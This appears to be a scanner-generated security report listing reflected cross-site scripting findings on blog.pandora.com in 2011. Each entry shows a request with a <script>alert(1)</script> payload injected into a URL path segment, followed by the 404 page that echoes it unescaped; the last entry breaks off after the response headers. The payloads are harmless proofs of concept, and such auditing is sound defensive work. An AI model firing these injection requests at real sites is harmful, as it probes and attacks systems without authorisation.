The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de66<script>alert(1)</script>475006746a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e9cf<script>alert(1)</script>65e022c3582 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61fb7<script>alert(1)</script>7b57931b113 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b45c8<script>alert(1)</script>6c1d1e3fb41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c321c<script>alert(1)</script>4ec169aa6ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa813<script>alert(1)</script>ceeadd94af1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57830<script>alert(1)</script>60d006b3a3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23646<script>alert(1)</script>c3ee8c2d938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b658<script>alert(1)</script>a757f005820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 490a0<script>alert(1)</script>2b229393208 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8018f<script>alert(1)</script>0037f1ec75a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb4ba<script>alert(1)</script>cf73c74ede8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d94d<script>alert(1)</script>f0d1317d4a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7e3f<script>alert(1)</script>451f1300ac6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb7b3<script>alert(1)</script>c9a6d62cd0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cc96<script>alert(1)</script>7c02a0cfd8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5cc96<script>alert(1)</script>7c02a0cfd8a/archives/2010/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d407f<script>alert(1)</script>90eda7c143c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd407f<script>alert(1)</script>90eda7c143c/2010/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff848<script>alert(1)</script>e2df3910455 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010ff848<script>alert(1)</script>e2df3910455/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edb24<script>alert(1)</script>4f85795b56c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d931d<script>alert(1)</script>e8c0ddecb85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
